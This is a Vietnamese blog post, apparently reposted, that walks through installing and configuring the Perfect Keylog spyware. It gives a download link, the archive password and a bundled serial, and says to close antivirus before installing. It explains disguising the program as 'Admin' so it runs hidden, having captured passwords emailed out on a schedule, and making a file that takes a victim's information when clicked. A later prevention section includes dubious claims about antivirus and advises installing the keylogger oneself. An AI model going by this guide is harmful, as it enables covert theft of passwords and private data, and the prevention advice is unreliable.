Hướng dẫn dùng Keylog và cách ngăn chặn

Có rất nhiều cách có thể hack mật khẩu của bạn, phần hôm nay mình sẽ giới thiệu về 1 phần mềm rất ư là nổi tiếng trong Underworld ( Thế giới ngầm dành cho hacker ) -- > Perfect Keylog. Mình nhớ có một người đã từng nói ( là ai thì mình quên mất tiu zùi :D) "Không có cái xấu , chỉ có những người sử dụng chúng vào mục đích xấu".

Perfect Keylog được tạo ra với mục đích ban đầu là dành cho các bậc cha mẹ muốn giám sát con của họ làm gì trên máy tính. Nhưng đó là mục đích tốt đẹp, một số người khác lại thích dùng chúng vào việc truy lùng bí mật đời tư người khác. Bài viết sau đây mình không có ý định khuyến khích các bạn soi mói những bí mật của người khác mà chỉ muốn đưa ra một cái nhìn tổng quan về những điều chúng ta làm. Mọi hành động đều có một kết quả và kết quả đó sẽ quyết định hành động tiếp theo của bạn.

key-log

Perfect Keylog và ứng dụng

Đầu tiên chúng ta phải hiểu rõ mục đích sử dụng phần mềm này. Tốt xấu do bạn quyết định. Nếu có thời gian rảnh rỗi bạn hãy vào trang : http://www.blazingtools.com/img/bpk.swf để tìm hiểu thêm.

Link Download Perfect Keylog: http://www.fshare.vn/file/T116H43Y8T

Pass giải nén: i4vn.com

Hướng dẫn cài đặt

Trước tiên, mình nói trước perfect Keylog là một phần mềm khá là nhạy cảm, do đó các chương trình diệt virus sẽ cảnh báo khi bạn cài đặt chương trình. Để cài đặt, bạn phải đóng chương trình diệt virus lại

Thông báo keylog của trình duyệt virus

Chạy file i_bpk_trial.exe trong file tải về

Nhập "open" khi hiện thông báo xác nhận có muốn cài đặt hay không.

Các bước sau coi hình cho dễ hiểu nhé :D

Keyword là tên hiện trong hệ thống máy tính (giả mạo chương tình). Ở đây mình gõ "Admin"

Đường dẫn lưu chương trình Perfect Keylog

Hướng dẫn sử dụng chương trình

Phần tiếp theo mọi người đều thích thì phải. Làm sao để thiết lập chương trình chạy một các tốt nhất. Nói trước mình sẽ không hướng dẫn chi tiết đâu, chỉ nói một số ý chính. Ban nào muốn tìm hiểu có thể mò.

Biểu tương chương trình sau khi cài đặt xong

Nhập Seri code có sẵn trong file tai về

keylog

Giao diện chính của chương trình Perfect Keylog

keylog

Chương trình chạy ẩn trong hệ thống - thấy chữ "Admin" quen không :D

Vào mục option để chỉnh lại cấu hình chương trình

keylog

Cấu hình email để chương trình tự động gửi mail về cho bạn

keylog

Nội dung email test tính năng gửi mail của chương trình

keylog

Perfect Keylog còn có một tính năng tạo file log (ai mà click vào file này sẽ tự động lấy mọi thông tin trong máy tính)

keylog

Mọi thông tin, mật khẩu, tên trang web, v.v... đều được perfect keylog lưu lại hết

keylog

Email sẽ tự động gửi về cho bạn theo thời gian định sẵn

 

Các cách phát hiện Perfect Keylog và ngăn chặn

Phần này đối nghịch với phần trên. Lý thuyết hoạt động của perfect keylog và vậy nhưng để phát hiện ra nó thì rất khó cho những bạn không rành về máy tính. Sau đây mình sẽ hướng dẫn các bạn môt số cách thức phát hiện keylog và ngăn chặn

Chương trình diệt virus

Hiện nay trên thị trướng có khá là nhiều chương trình diệt virus, nào là norton , bkav , McAfree , umbrella v.v.... ôi thôi quá nhiều. Lời khuyên đầu tiên dành cho bạn: chỉ nên cài duy nhât 1 chương trình diệt virus . Có một bí mật mà bạn nào nghe xong chắc cũng phải giật mình: máy tính hư có hơn 50% trường hợp là do trình diệt virus gây ra. Về cơ bản, trình diệt virus sẽ quét các tập tin, phát hiện chương trình nào có virus sẽ xoá đi hoặc không cho sử dụng. Vậy sẽ như thế nào nếu như có đến 2~3 chương trình diệt virus cũng hành động như vậy ? Các chương trình sẽ chạy chồng chéo lên nhau dẫn đến việc một xoá một số file nhạy cảm trong máy tính bạn ( nhân đây mình nói thêm 1 hacker thường cài đặt virus vào những thư mục nằm ẩn trong hệ thống để có thể dễ dàng hack máy tính). Chỉ cần xoá nhầm 1 file bất kỳ nào trong hệ thống --> hư win

Các bạn dừng quan trọng hoá vấn đề thu phí hay miễn phí. Một số chương trình miễn phí cũng hoạt động rất tốt. Do đó nếu bạn thích chương trình diệt virus nào thì hãy dùng nó.

Cẩn thận là trên hết

Máy tính, laptop của bạn luôn luôn có một phần mềm tuyệt vời đó là bắt người dùng phải đăng nhập Password (user password ) mới có thể sử dụng window. Sao các bạn lại không sử dụng để ngăn chặn những ánh mắt tò mò của người khác. Một ngày đẹp trời nào đó, bạn bị mất cái laptop thế là mọi thông tin bạn lưu trong dó đều có nguy cơ bạn người khác biết. Hãy sử dụng password cho máy tính của bạn để gây khó khăn cho người khác.

Nói thì nhiều nhưng thực tế lại hoàn toàn khác. Tính năng user password chỉ dành cho những người không chuyên về hack. Còn về những bạn có hiểu biết về công nghệ thông tin thì tính năng này coi như bỏ. Có cũng như không. Chỉ cần mất chưa tới 3 phút là có thể phá password như chơi. Nhưng cài thì vẫn tốt hơn là không cài devil

Lấy độc trị độc

Một số phần mềm có tính năng chỉ cho phép chạy 1 lần duy nhất trong cùng một thời điểm. Tức là bạn đang chạy phần mềm này, không thể chạy thêm 1 phần mềm tương tự. Perfect Keylog do phải truy cập vào hệ thống người dùng nên nó bắt buộc phải chạy duy nhất. Hãy cài đặt Perfect Keylog ngay trên máy của các bạn và đặt pass. Như vậy trên lý thuyết sẽ người khác sẽ không thể cài đặt chương trình Perfect Keylog nào khác.Ý tưởng này cũng không tồi đó chứ. Heroin dùng nhiều có thể gây chết người nhưng dùng ít thì có thể dùng trong giảm đau hôn mê. Như phần đầu mình đã nói: xấu hay tốt là do bạn quyết định.

Nói nhiều mỏi tay quá :D . Mình xin kết thúc tại đây. Mọi người đều có những bí mật và bạn có nên lục những bí mật ra để thoả mãn tính tò mò của mình hay không?

theo Scampi4vn